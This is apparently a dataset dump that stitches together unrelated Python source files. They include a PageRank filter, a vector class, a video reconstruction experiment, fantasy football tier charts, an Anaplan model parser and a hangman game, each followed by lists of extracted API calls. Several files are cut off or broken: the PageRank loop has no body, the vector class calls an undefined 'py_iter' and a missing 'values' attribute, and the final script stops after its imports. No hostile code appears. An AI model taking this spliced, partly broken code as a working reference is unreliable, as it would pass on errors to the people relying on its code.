storage = Storage(context)
callback(storage.get(path)) | [
"lp_mongodb.storages.mongo_storage.Storage"
] | [((473, 489), 'lp_mongodb.storages.mongo_storage.Storage', 'Storage', (['context'], {}), '(context)\n', (480, 489), False, 'from lp_mongodb.storages.mongo_storage import Storage\n')] |
import numpy as np
from tabulate import tabulate
import matplotlib.pyplot as plt
import Page_Rank_Utils as pru
def detectedConverged(y,x,epsilon):
C = set()
N = set()
for i in range(len(y)):
if abs(y[i] - x[i])/abs(x[i]) < epsilon:
C.add(i)
else:
N.add(i)
return N, C
def filter(A_prime, x_prime, N, C):
n = N.shape[0]
for i in range(n):
if i in C:
x_prime[i] = 0
for j in range(n):
A_prime[i][j] = 0
return A_prime, x_prime
def Filter_APR(G, weight, period):
P = pru.stochastic_transition_matrix(G, weight, True)
n = P.shape[0]
# initialize eigenvectors
v_list = []
idx = 0
v_init = np.zeros(n)
v_init[-1] = 1
v_list.append(v_init)
converged = True
while not converged:
return
| [
"Page_Rank_Utils.stochastic_transition_matrix",
"numpy.zeros"
] | [((591, 640), 'Page_Rank_Utils.stochastic_transition_matrix', 'pru.stochastic_transition_matrix', (['G', 'weight', '(True)'], {}), '(G, weight, True)\n', (623, 640), True, 'import Page_Rank_Utils as pru\n'), ((733, 744), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (741, 744), True, 'import numpy as np\n')] |
from troyka_led_matrix import TroykaLedMatrix
from urandom import getrandbits
import time
matrix = TroykaLedMatrix()
while True:
matrix.draw_pixel(getrandbits(3), getrandbits(3))
matrix.clear_pixel(getrandbits(3), getrandbits(3))
time.sleep_ms(50)
| [
"time.sleep_ms",
"urandom.getrandbits",
"troyka_led_matrix.TroykaLedMatrix"
] | [((104, 121), 'troyka_led_matrix.TroykaLedMatrix', 'TroykaLedMatrix', ([], {}), '()\n', (119, 121), False, 'from troyka_led_matrix import TroykaLedMatrix\n'), ((253, 270), 'time.sleep_ms', 'time.sleep_ms', (['(50)'], {}), '(50)\n', (266, 270), False, 'import time\n'), ((160, 174), 'urandom.getrandbits', 'getrandbits', (['(3)'], {}), '(3)\n', (171, 174), False, 'from urandom import getrandbits\n'), ((176, 190), 'urandom.getrandbits', 'getrandbits', (['(3)'], {}), '(3)\n', (187, 190), False, 'from urandom import getrandbits\n'), ((216, 230), 'urandom.getrandbits', 'getrandbits', (['(3)'], {}), '(3)\n', (227, 230), False, 'from urandom import getrandbits\n'), ((232, 246), 'urandom.getrandbits', 'getrandbits', (['(3)'], {}), '(3)\n', (243, 246), False, 'from urandom import getrandbits\n')] |
import math
import itertools
class Vector:
"""
Generic vector operations.
"""
def _apply(self,op, other):
pairwise = None
if type(other) is Vector:
pairwise = zip(self.vals, other.vals)
else:
pairwise = zip(self.vals, [other for _ in self.vals])
return Vector(*itertools.starmap(op, pairwise))
def __init__(self, *args):
self.vals = args
def __add__(self, other):
return self._apply(lambda a, b: a + b, other)
def __sub__(self, other):
return self._apply(lambda a, b: a - b, other)
def __mul__(self, other):
return self._apply(lambda a, b: a*b, other)
def __div__(self, other):
return self._apply(lambda a, b: a / b, other)
def length(self):
total = sum(map(lambda a: math.pow(a, 2), self.vals))
return math.sqrt(total)
def normalized(self):
divisor = [self.length()] * len(self)
return Vector(*(self / divisor))
def __iter__(self):
return py_iter(self.vals)
@classmethod
def map(cls, *args):
return args[0].map(args[1:])
def __getitem__(self, item):
return self.values[item]
def __str__(self):
return str(self.vals)
def __len__(self):
return len(self.vals)
@classmethod
def add(cls, a, b):
return Vector(*a) + Vector(*b)
@classmethod
def sub(cls, a, b):
return Vector(*a) - Vector(*b)
@classmethod
def mul(cls, a, b):
return Vector(*a) * Vector(*b)
@classmethod
def div(cls, a, b):
return Vector(*a) / Vector(*b)
@classmethod
def dot(cls, left, right):
return sum(Vector.mul(left, right))
@classmethod
def norm_dot(Vector, left, right):
left = Vector(*left).normalized()
right = Vector(*right).normalized()
return sum(Vector.mul(left, right))
| [
"math.pow",
"math.sqrt",
"itertools.starmap"
] | [((907, 923), 'math.sqrt', 'math.sqrt', (['total'], {}), '(total)\n', (916, 923), False, 'import math\n'), ((359, 390), 'itertools.starmap', 'itertools.starmap', (['op', 'pairwise'], {}), '(op, pairwise)\n', (376, 390), False, 'import itertools\n'), ((863, 877), 'math.pow', 'math.pow', (['a', '(2)'], {}), '(a, 2)\n', (871, 877), False, 'import math\n')] |
import numpy as np
import os
os.environ['TF_FORCE_GPU_ALLOW_GROWTH']='true'
import datetime
from sacred import Experiment
from sacred.observers import FileStorageObserver
from datasets.ucf101 import UCF101Dataset
from algorithms.kerasvideoonenet import KerasVideoOneNet
from algorithms.kerasvideoonenet_admm import KerasVideoOneNetADMM
from algorithms.numpyvideowaveletsparsity_admm import NumpyVideoWaveletSparsityADMM
name = os.path.basename(__file__).split('.')[0]
ex = Experiment(name)
dt = datetime.datetime.now()
results_dir = 'results/' + name + '/' + '{y:04d}{mo:02d}{d:02d}{h:02d}{mi:02d}{s:02d}_{p:05d}'.format(y=dt.year, mo=dt.month, d=dt.day, h=dt.hour, mi=dt.minute, s=dt.second, p=os.getpid()) + '_' + os.uname()[1]
ex.observers.append(FileStorageObserver.create(results_dir))
@ex.config
def cfg():
_data = {'path': 'datasets/UCF-101',
'path_split': 'datasets/ucfTrainTestlist',
'split': 1,
'batch_size': 2,
'frames': 4,
'size': 32,
'dtype': 'float32',
'problems_test': [('inpaint', {'drop_prob': 0.5}),
('center', {'box_size_ratio': 0.4}),
('block', {'box_size_ratio': 0.2,
'total_box': 10}),
('superres', {'resize_ratio': 0.5}),
('superres', {'resize_ratio': 0.25}),
('cs', {'compress_ratio': 0.1}),
('videocs', {'compress_ratio': 0.1}),
('blurdisk', {'size': 4,
'radius': 2.}),
('blurmotion', {'size': 7}),
('videoblurdisk', {'size': 4,
'radius': 2.}),
('frameinterp', {'interp_ratio': 0.5}),
('frameinterp', {'interp_ratio': 0.25}),
('prediction', {'predict_ratio': 0.75}),
('prediction', {'predict_ratio': 0.5}),
('prediction', {'predict_ratio': 0.25}),
('colorization', {})]}
_data['problems_train'] = _data['problems_test']
_algo = {'batch_size': _data['batch_size'],
'shape1': _data['frames'],
'shape2': _data['size'],
'shape3': _data['size'],
'shape4': 3,
'max_iter': 13,
'filters': 256,
'filter_size_enc': 5,
'filter_size_dec': 7,
'rnn': True,
'l2': 0.,
'epochs': 50,
'patience': 5,
'lr': 1e-4,
'clipnorm': 1.,
'dtype': _data['dtype'],
'workers': 14,
'max_queue_size': 2,
'gpus': 2}
@ex.named_config
def videoonenet():
_algo = {'mode': 'videoonenet',
'rho': 0.3}
@ex.named_config
def videoonenetadmm():
_algo = {'mode': 'videoonenetadmm',
'rho': 0.3}
@ex.named_config
def videowaveletsparsityadmm():
_algo = {'mode': 'videowaveletsparsityadmm',
'rho': 0.3,
'lambda_l1': 0.05}
@ex.named_config
def rnn():
_algo = {'rnn': True}
@ex.named_config
def nornn():
_algo = {'rnn': False}
@ex.automain
def run(_data, _algo, _rnd, _seed):
_data_train = _data.copy()
_data_train['problems'] = _data['problems_train']
data = UCF101Dataset(config=_data_train, seed=_seed)
if _algo['mode'] == 'videoonenet':
alg = KerasVideoOneNet(results_dir=results_dir, config=_algo)
elif _algo['mode'] == 'videoonenetadmm':
alg = KerasVideoOneNetADMM(results_dir=results_dir, config=_algo)
elif _algo['mode'] == 'videowaveletsparsityadmm':
alg = NumpyVideoWaveletSparsityADMM(results_dir=results_dir, config=_algo)
alg.build()
result = []
alg.train(data.seq_train, X_val=data.seq_val)
# remove threading from generator for reproducibility in testing
_algo_problem = _algo.copy()
_algo_problem['workers'] = 1
_algo_problem['max_queue_size'] = 1
alg.set_config(_algo_problem)
for problem in _data['problems_test']:
_data_test = _data.copy()
_data_test['problems'] = [problem]
# generate some test images
data.generate_sequences(config=_data_test, seed=_seed)
for b, batch in enumerate(np.linspace(0, len(data.seq_test), 32, endpoint=False).astype(np.int64)):
alg.plot_predictions(data.seq_test[batch], problem, filepath=(results_dir + '/videos_test_%04d.png') % b)
# evaluate mean loss on test images
data.generate_sequences(config=_data_test, seed=_seed)
result_test = alg.test(data.seq_test)
result.append([problem[0], problem[1], result_test])
print(result[-1])
return result
| [
"datasets.ucf101.UCF101Dataset",
"sacred.observers.FileStorageObserver.create",
"algorithms.numpyvideowaveletsparsity_admm.NumpyVideoWaveletSparsityADMM",
"sacred.Experiment",
"algorithms.kerasvideoonenet_admm.KerasVideoOneNetADMM",
"datetime.datetime.now",
"os.path.basename",
"os.getpid",
"algorith... | [((475, 491), 'sacred.Experiment', 'Experiment', (['name'], {}), '(name)\n', (485, 491), False, 'from sacred import Experiment\n'), ((497, 520), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (518, 520), False, 'import datetime\n'), ((752, 791), 'sacred.observers.FileStorageObserver.create', 'FileStorageObserver.create', (['results_dir'], {}), '(results_dir)\n', (778, 791), False, 'from sacred.observers import FileStorageObserver\n'), ((3571, 3616), 'datasets.ucf101.UCF101Dataset', 'UCF101Dataset', ([], {'config': '_data_train', 'seed': '_seed'}), '(config=_data_train, seed=_seed)\n', (3584, 3616), False, 'from datasets.ucf101 import UCF101Dataset\n'), ((718, 728), 'os.uname', 'os.uname', ([], {}), '()\n', (726, 728), False, 'import os\n'), ((3671, 3726), 'algorithms.kerasvideoonenet.KerasVideoOneNet', 'KerasVideoOneNet', ([], {'results_dir': 'results_dir', 'config': '_algo'}), '(results_dir=results_dir, config=_algo)\n', (3687, 3726), False, 'from algorithms.kerasvideoonenet import KerasVideoOneNet\n'), ((429, 455), 'os.path.basename', 'os.path.basename', (['__file__'], {}), '(__file__)\n', (445, 455), False, 'import os\n'), ((3786, 3845), 'algorithms.kerasvideoonenet_admm.KerasVideoOneNetADMM', 'KerasVideoOneNetADMM', ([], {'results_dir': 'results_dir', 'config': '_algo'}), '(results_dir=results_dir, config=_algo)\n', (3806, 3845), False, 'from algorithms.kerasvideoonenet_admm import KerasVideoOneNetADMM\n'), ((3914, 3982), 'algorithms.numpyvideowaveletsparsity_admm.NumpyVideoWaveletSparsityADMM', 'NumpyVideoWaveletSparsityADMM', ([], {'results_dir': 'results_dir', 'config': '_algo'}), '(results_dir=results_dir, config=_algo)\n', (3943, 3982), False, 'from algorithms.numpyvideowaveletsparsity_admm import NumpyVideoWaveletSparsityADMM\n'), ((697, 708), 'os.getpid', 'os.getpid', ([], {}), '()\n', (706, 708), False, 'import os\n')] |
#tiersweekly.py
from fantasyfootball import tiers
from fantasyfootball import fantasypros as fp
from fantasyfootball import config
from fantasyfootball import ffcalculator
from fantasyfootball.config import FIGURE_DIR
from sklearn.cluster import KMeans
from sklearn.mixture import GaussianMixture
from matplotlib import pyplot as plt
from matplotlib import patches as mpatches
from matplotlib.lines import Line2D
import numpy as np
import matplotlib.style as style
from datetime import date
from os import path
from collections import OrderedDict
flex_list = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>']
work_list = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>'
]
sean_list = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>'
]
justin_list = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME> II',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>'
]
different_spelling = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
]
def make_clustering_viz_flex(tiers=15, kmeans=False, league=config.sean, player_cutoff=150, player_per_chart=50, x_size=20, y_size=15, covariance_type='diag', save=True, export=False, player_list=None):
"""
Generates a chart with colored tiers; you can either use kmeans of GMM
Optional: Pass in a custom tier dict to show varying numbers of tiers; default will be uniform across position
Optional: Pass in a custom pos_n dict to show different numbers of players by position
"""
pos = 'FLEX'
palette = ['red', 'blue', 'green', 'orange', '#900C3F', 'maroon', 'cornflowerblue', 'greenyellow', 'coral', 'orchid', 'firebrick', 'lightsteelblue', 'palegreen', 'darkorange', 'crimson', 'darkred', 'aqua', 'forestgreen', 'navajowhite', 'mediumpurple']
pos_shape = {
'RB': 'o',
'WR': 's',
'TE': '^'
}
df = fp.create_fantasy_pros_ecr_df(league)
#derive pos for flex players
pos_df = df.loc[df['pos'] != pos]
pos_map = dict(zip(pos_df['player_name'].to_list(), pos_df['pos'].to_list()))
df['pos_map'] = df['player_name'].map(pos_map)
df = (df.loc[df['pos'] == pos]
.sort_values('rank')
.reset_index(drop=True)
.head(player_cutoff)
)
df['rank'] = df['rank'].astype('int')
today = date.today()
date_str = today.strftime('%m.%d.%Y')
x = df.loc[:, ['best', 'worst', 'avg']].copy()
if kmeans:
kmm = KMeans(n_clusters=tiers).fit(x)
labels = kmm.predict(x)
else: #gausianmixture
gmm = GaussianMixture(n_components=tiers, covariance_type=covariance_type, random_state=0).fit(x)
labels = gmm.predict(x)
unique_labels = list(OrderedDict.fromkeys(labels))
rank_dict = dict(zip(unique_labels, range(1,len(unique_labels)+1)))
df['tiers'] = labels
df['tiers'] = df['tiers'].map(rank_dict)
style.use('ggplot')
colors = dict(zip(range(1, tiers+1), palette[:tiers]))
tier_lookup = dict(zip(palette[:tiers], range(1, tiers+1)))
chart_n = (player_cutoff // player_per_chart) + (player_cutoff % player_per_chart > 0)
#filter current team players
if isinstance(player_list, list):
df = df.loc[df['player_name'].isin(player_list)].copy()
for ix, chunk_df in enumerate(np.array_split(df, chart_n)):
fig, ax = plt.subplots();
min_tier = min(chunk_df['tiers'])
max_tier = max(chunk_df['tiers'])
patches = []
color_chunk = [colors[i] for i in range(min_tier, max_tier + 1)]
patches = [mpatches.Patch(color=color, alpha=0.5, label=f'Tier {tier_lookup[color]}') for color in color_chunk]
pos_patches = [Line2D([0], [0], color='gray', label=pos, marker=shape, lw=0, markersize=12) for pos, shape in pos_shape.items()]
for _, row in chunk_df.iterrows():
xmin = row['best']
xmax = row['worst']
ymin, ymax = row['rank'], row['rank']
center = row['avg']
player = row['player_name'] + ', ' +row['tm'] + ' (' + row['pos_map'] + ')'
tier = row['tiers']
plt.scatter(center, ymax, color='gray', zorder=2, s=100, marker=pos_shape[row['pos_map']])
plt.scatter(xmin, ymax, marker= "|", color=colors.get(tier, 'moccasin'), alpha=0.5, zorder=1)
plt.scatter(xmax, ymax, marker= "|", color=colors.get(tier, 'moccasin'), alpha=0.5, zorder=1)
plt.plot((xmin, xmax), (ymin, ymax), color=colors.get(tier, 'moccasin'), alpha=0.5, zorder=1, linewidth=5.0)
plt.annotate(player, xy=(xmax+1, ymax))
#first legend
first_legend = plt.legend(handles=pos_patches, loc='lower left', borderpad=1, fontsize=12)
ax = plt.gca().add_artist(first_legend)
#second legend
plt.legend(handles=patches, borderpad=1, fontsize=12)
if player_list is not None:
league_name = league['name']
plt.title(f'{date_str} Fantasy Football Weekly - {pos} - {league_name} - {ix+1}')
else:
plt.title(f'{date_str} Fantasy Football Weekly - {pos} {ix+1}')
plt.xlabel('Average Expert Overall Rank')
plt.ylabel('Expert Consensus Position Rank')
fig.set_size_inches(x_size, y_size)
plt.gca().invert_yaxis()
#plt.tight_layout()
if save:
if kmeans:
if player_list is not None:
plt.savefig(path.join(FIGURE_DIR,fr'{date_str}_rangeofrankings_kmeans__FLEX_{league_name}_{ix+1}.png'))
else:
plt.savefig(path.join(FIGURE_DIR,fr'{date_str}_rangeofrankings_kmeans__{pos}_{ix+1}.png'))
else:
if player_list is not None:
plt.savefig(path.join(FIGURE_DIR,fr'{date_str}_rangeofrankings_gmm__FLEX_list{league_name}_{ix+1}.png'))
else:
plt.savefig(path.join(FIGURE_DIR,fr'{date_str}_rangeofrankings_gmm_{pos}_{ix+1}.png'))
if export:
df.to_csv(path.join(FIGURE_DIR,fr'{date_str}_ecr_tiers.csv'), index=False)
#return plt.show()
if __name__ == "__main__":
#run elbow chart or AIC/BIC chart to estimate optimal number of k for each pos
#revisit week 1 to see if URL changes for each week - if so, refactor viz func and fp df func
sean = config.sean
work = config.work
justin = config.justin
pos_tier_dict_viz = {
'RB' : 8,
'QB' : 6,
'WR' : 5,
'TE' : 5,
'DST' : 6,
'K' : 7
}
tiers.make_clustering_viz(tier_dict=pos_tier_dict_viz, league=sean, pos_n=35, covariance_type='diag', draft=False, save=True)
make_clustering_viz_flex(export=True)
make_clustering_viz_flex(league=sean, player_list=sean_list)
make_clustering_viz_flex(league=work, player_list=work_list)
make_clustering_viz_flex(league=justin, player_list=justin_list)
| [
"matplotlib.pyplot.ylabel",
"fantasyfootball.tiers.make_clustering_viz",
"numpy.array_split",
"matplotlib.pyplot.annotate",
"matplotlib.style.use",
"matplotlib.lines.Line2D",
"collections.OrderedDict.fromkeys",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.scatter",
"sklearn.mixture.GaussianMixtu... | [((2721, 2758), 'fantasyfootball.fantasypros.create_fantasy_pros_ecr_df', 'fp.create_fantasy_pros_ecr_df', (['league'], {}), '(league)\n', (2750, 2758), True, 'from fantasyfootball import fantasypros as fp\n'), ((3148, 3160), 'datetime.date.today', 'date.today', ([], {}), '()\n', (3158, 3160), False, 'from datetime import date\n'), ((3746, 3765), 'matplotlib.style.use', 'style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (3755, 3765), True, 'import matplotlib.style as style\n'), ((7407, 7537), 'fantasyfootball.tiers.make_clustering_viz', 'tiers.make_clustering_viz', ([], {'tier_dict': 'pos_tier_dict_viz', 'league': 'sean', 'pos_n': '(35)', 'covariance_type': '"""diag"""', 'draft': '(False)', 'save': '(True)'}), "(tier_dict=pos_tier_dict_viz, league=sean, pos_n=\n 35, covariance_type='diag', draft=False, save=True)\n", (7432, 7537), False, 'from fantasyfootball import tiers\n'), ((3536, 3564), 'collections.OrderedDict.fromkeys', 'OrderedDict.fromkeys', (['labels'], {}), '(labels)\n', (3556, 3564), False, 'from collections import OrderedDict\n'), ((4155, 4182), 'numpy.array_split', 'np.array_split', (['df', 'chart_n'], {}), '(df, chart_n)\n', (4169, 4182), True, 'import numpy as np\n'), ((4203, 4217), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (4215, 4217), True, 'from matplotlib import pyplot as plt\n'), ((5518, 5593), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'handles': 'pos_patches', 'loc': '"""lower left"""', 'borderpad': '(1)', 'fontsize': '(12)'}), "(handles=pos_patches, loc='lower left', borderpad=1, fontsize=12)\n", (5528, 5593), True, 'from matplotlib import pyplot as plt\n'), ((5673, 5726), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'handles': 'patches', 'borderpad': '(1)', 'fontsize': '(12)'}), '(handles=patches, borderpad=1, fontsize=12)\n', (5683, 5726), True, 'from matplotlib import pyplot as plt\n'), ((5996, 6037), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Average Expert Overall Rank"""'], {}), "('Average Expert Overall Rank')\n", (6006, 6037), True, 'from matplotlib import pyplot as plt\n'), ((6046, 6090), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Expert Consensus Position Rank"""'], {}), "('Expert Consensus Position Rank')\n", (6056, 6090), True, 'from matplotlib import pyplot as plt\n'), ((4416, 4490), 'matplotlib.patches.Patch', 'mpatches.Patch', ([], {'color': 'color', 'alpha': '(0.5)', 'label': 'f"""Tier {tier_lookup[color]}"""'}), "(color=color, alpha=0.5, label=f'Tier {tier_lookup[color]}')\n", (4430, 4490), True, 'from matplotlib import patches as mpatches\n'), ((4540, 4616), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'color': '"""gray"""', 'label': 'pos', 'marker': 'shape', 'lw': '(0)', 'markersize': '(12)'}), "([0], [0], color='gray', label=pos, marker=shape, lw=0, markersize=12)\n", (4546, 4616), False, 'from matplotlib.lines import Line2D\n'), ((4996, 5091), 'matplotlib.pyplot.scatter', 'plt.scatter', (['center', 'ymax'], {'color': '"""gray"""', 'zorder': '(2)', 's': '(100)', 'marker': "pos_shape[row['pos_map']]"}), "(center, ymax, color='gray', zorder=2, s=100, marker=pos_shape[\n row['pos_map']])\n", (5007, 5091), True, 'from matplotlib import pyplot as plt\n'), ((5432, 5473), 'matplotlib.pyplot.annotate', 'plt.annotate', (['player'], {'xy': '(xmax + 1, ymax)'}), '(player, xy=(xmax + 1, ymax))\n', (5444, 5473), True, 'from matplotlib import pyplot as plt\n'), ((5816, 5904), 'matplotlib.pyplot.title', 'plt.title', (['f"""{date_str} Fantasy Football Weekly - {pos} - {league_name} - {ix + 1}"""'], {}), "(\n f'{date_str} Fantasy Football Weekly - {pos} - {league_name} - {ix + 1}')\n", (5825, 5904), True, 'from matplotlib import pyplot as plt\n'), ((5924, 5989), 'matplotlib.pyplot.title', 'plt.title', (['f"""{date_str} Fantasy Football Weekly - {pos} {ix + 1}"""'], {}), "(f'{date_str} Fantasy Football Weekly - {pos} {ix + 1}')\n", (5933, 5989), True, 'from matplotlib import pyplot as plt\n'), ((3283, 3307), 'sklearn.cluster.KMeans', 'KMeans', ([], {'n_clusters': 'tiers'}), '(n_clusters=tiers)\n', (3289, 3307), False, 'from sklearn.cluster import KMeans\n'), ((3387, 3475), 'sklearn.mixture.GaussianMixture', 'GaussianMixture', ([], {'n_components': 'tiers', 'covariance_type': 'covariance_type', 'random_state': '(0)'}), '(n_components=tiers, covariance_type=covariance_type,\n random_state=0)\n', (3402, 3475), False, 'from sklearn.mixture import GaussianMixture\n'), ((5607, 5616), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (5614, 5616), True, 'from matplotlib import pyplot as plt\n'), ((6144, 6153), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6151, 6153), True, 'from matplotlib import pyplot as plt\n'), ((6896, 6946), 'os.path.join', 'path.join', (['FIGURE_DIR', 'f"""{date_str}_ecr_tiers.csv"""'], {}), "(FIGURE_DIR, f'{date_str}_ecr_tiers.csv')\n", (6905, 6946), False, 'from os import path\n'), ((6313, 6409), 'os.path.join', 'path.join', (['FIGURE_DIR', 'f"""{date_str}_rangeofrankings_kmeans__FLEX_{league_name}_{ix + 1}.png"""'], {}), "(FIGURE_DIR,\n f'{date_str}_rangeofrankings_kmeans__FLEX_{league_name}_{ix + 1}.png')\n", (6322, 6409), False, 'from os import path\n'), ((6460, 6539), 'os.path.join', 'path.join', (['FIGURE_DIR', 'f"""{date_str}_rangeofrankings_kmeans__{pos}_{ix + 1}.png"""'], {}), "(FIGURE_DIR, f'{date_str}_rangeofrankings_kmeans__{pos}_{ix + 1}.png')\n", (6469, 6539), False, 'from os import path\n'), ((6633, 6730), 'os.path.join', 'path.join', (['FIGURE_DIR', 'f"""{date_str}_rangeofrankings_gmm__FLEX_list{league_name}_{ix + 1}.png"""'], {}), "(FIGURE_DIR,\n f'{date_str}_rangeofrankings_gmm__FLEX_list{league_name}_{ix + 1}.png')\n", (6642, 6730), False, 'from os import path\n'), ((6780, 6855), 'os.path.join', 'path.join', (['FIGURE_DIR', 'f"""{date_str}_rangeofrankings_gmm_{pos}_{ix + 1}.png"""'], {}), "(FIGURE_DIR, f'{date_str}_rangeofrankings_gmm_{pos}_{ix + 1}.png')\n", (6789, 6855), False, 'from os import path\n')] |
"""Pauses the execution."""
import time
from dodo_commands.framework.decorator_utils import uses_decorator
class Decorator:
def is_used(self, config, command_name, decorator_name):
return uses_decorator(config, command_name, decorator_name)
def add_arguments(self, parser): # override
parser.add_argument(
"--pause-ms", type=int, help="Pause in milliseconds before continuing"
)
def modify_args(self, command_line_args, args_tree_root_node, cwd): # override
if getattr(command_line_args, "pause_ms", 0):
time.sleep(command_line_args.pause_ms / 1000)
return args_tree_root_node, cwd
| [
"dodo_commands.framework.decorator_utils.uses_decorator",
"time.sleep"
] | [((203, 255), 'dodo_commands.framework.decorator_utils.uses_decorator', 'uses_decorator', (['config', 'command_name', 'decorator_name'], {}), '(config, command_name, decorator_name)\n', (217, 255), False, 'from dodo_commands.framework.decorator_utils import uses_decorator\n'), ((579, 624), 'time.sleep', 'time.sleep', (['(command_line_args.pause_ms / 1000)'], {}), '(command_line_args.pause_ms / 1000)\n', (589, 624), False, 'import time\n')] |
import logging
from typing import List
from .AnaplanRequest import AnaplanRequest
from .User import User
from .ModelDetails import ModelDetails
logger = logging.getLogger(__name__)
class Model(User):
def get_models_url(self) -> AnaplanRequest:
"""Get list of all Anaplan model for the specified user.
:return: Object containing API request details
:rtype: AnaplanRequest
"""
url = ''.join([super().get_url(), super().get_id(), "/models"])
get_header = {
"Content-Type": "application/json"
}
return AnaplanRequest(url=url, header=get_header)
@staticmethod
def parse_models(model_list: dict) -> List[ModelDetails]:
"""Get list of all Anaplan model for the specified user.
:param model_list: JSON list of models accessible to the current user
:type model_list: dict
:raises AttributeError: No models available for specified user.
:return: Details for all models the user can access.
:rtype: List[ModelDetails]
"""
model_details_list = [ModelDetails]
logger.info(f"Parsing models...")
if 'models' in model_list:
models = model_list['models']
logger.info("Finished parsing models.")
for item in models:
model_details_list.append(ModelDetails(item))
return model_details_list
else:
raise AttributeError("Models not found in response.")
| [
"logging.getLogger"
] | [((154, 181), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (171, 181), False, 'import logging\n')] |
# Hangman game
#
# -----------------------------------
# Helper code
# You don't need to understand this helper code,
# but you will have to know how to use the functions
# (so be sure to read the docstrings!)
import random
import string
WORDLIST_FILENAME = "/Users/deedeebanh/Documents/MITx_6.00.1.x/ProblemSet3/words.txt"
def loadWords():
"""
Returns a list of valid words. Words are strings of lowercase letters.
Depending on the size of the word list, this function may
take a while to finish.
"""
print("Loading word list from file...")
# inFile: file
inFile = open(WORDLIST_FILENAME, 'r')
# line: string
line = inFile.readline()
# wordlist: list of strings
wordlist = line.split()
print(" ", len(wordlist), "words loaded.")
return wordlist
def chooseWord(wordlist):
"""
wordlist (list): list of words (strings)
Returns a word from wordlist at random
"""
return random.choice(wordlist)
# end of helper code
# -----------------------------------
# Load the list of words into the variable wordlist
# so that it can be accessed from anywhere in the program
wordlist = loadWords()
def isWordGuessed(secretWord, lettersGuessed):
'''
secretWord: string, the word the user is guessing
lettersGuessed: list, what letters have been guessed so far
returns: boolean, True if all the letters of secretWord are in lettersGuessed;
False otherwise
'''
# FILL IN YOUR CODE HERE...
isAinB = [item in lettersGuessed for item in secretWord]
return (all(isAinB))
def getGuessedWord(secretWord, lettersGuessed):
'''
secretWord: string, the word the user is guessing
lettersGuessed: list, what letters have been guessed so far
returns: string, comprised of letters and underscores that represents
what letters in secretWord have been guessed so far.
'''
# FILL IN YOUR CODE HERE...
store = list('_'*len(secretWord)) #first set up ___ = length of secretWord
for i in range(len(secretWord)):
for j in range(len(lettersGuessed)):
if lettersGuessed[j] == secretWord[i]:
store[i] = lettersGuessed[j] #replace _ with the letter
return (''.join(store))
def getAvailableLetters(lettersGuessed):
'''
lettersGuessed: list, what letters have been guessed so far
returns: string, comprised of letters that represents what letters have not
yet been guessed.
'''
# FILL IN YOUR CODE HERE...
diff = [item for item in (list(string.ascii_lowercase)) if item not in lettersGuessed]
return (''.join(diff))
def hangman(secretWord):
'''
secretWord: string, the secret word to guess.
Starts up an interactive game of Hangman.
* At the start of the game, let the user know how many
letters the secretWord contains.
* Ask the user to supply one guess (i.e. letter) per round.
* The user should receive feedback immediately after each guess
about whether their guess appears in the computers word.
* After each round, you should also display to the user the
partially guessed word so far, as well as letters that the
user has not yet guessed.
Follows the other limitations detailed in the problem write-up.
'''
# FILL IN YOUR CODE HERE...
print('Welcome to the game, Hangman!')
print('I am thinking of a word that is ' + str(len(secretWord)) + ' letters long.')
print('-------------')
numOfGuesses = 8
lettersGuessed = list()
while numOfGuesses > 0:
print("You have " + str(numOfGuesses) + " guesses left.")
print("Available letters: " + getAvailableLetters(lettersGuessed))
var = input("Please guess a letter: ")
var = var.lower()
if var in lettersGuessed:
print("Oops! You've already guessed that letter: " + getGuessedWord(secretWord, lettersGuessed))
elif var not in secretWord:
print("Oops! That letter is not in my word: " + getGuessedWord(secretWord, lettersGuessed))
lettersGuessed.append(var)
numOfGuesses -= 1
else:
lettersGuessed.append(var)
print("Good Guess: " + getGuessedWord(secretWord, lettersGuessed))
print("------------")
if (isWordGuessed(secretWord, lettersGuessed) == True):
print("Congratulations, you won!")
return 1
if (numOfGuesses == 0):
print("Sorry, you ran out of guesses. The word was " + secretWord)
return 1
return 0
# When you've completed your hangman function, uncomment these two lines
# and run this file to test! (hint: you might want to pick your own
# secretWord while you're testing)
secretWord = chooseWord(wordlist).lower()
#secretWord = 'c'
hangman(secretWord)
| [
"random.choice"
] | [((951, 974), 'random.choice', 'random.choice', (['wordlist'], {}), '(wordlist)\n', (964, 974), False, 'import random\n')] |
#!/usr/bin/python3
import argparse
from datetime import datetime
import json
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5 import uic
import os
import sys
from weather import Weather
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
DISP_SIZE = (640, 384)
WHITE = 0xffffffff
BLACK = 0xff000000
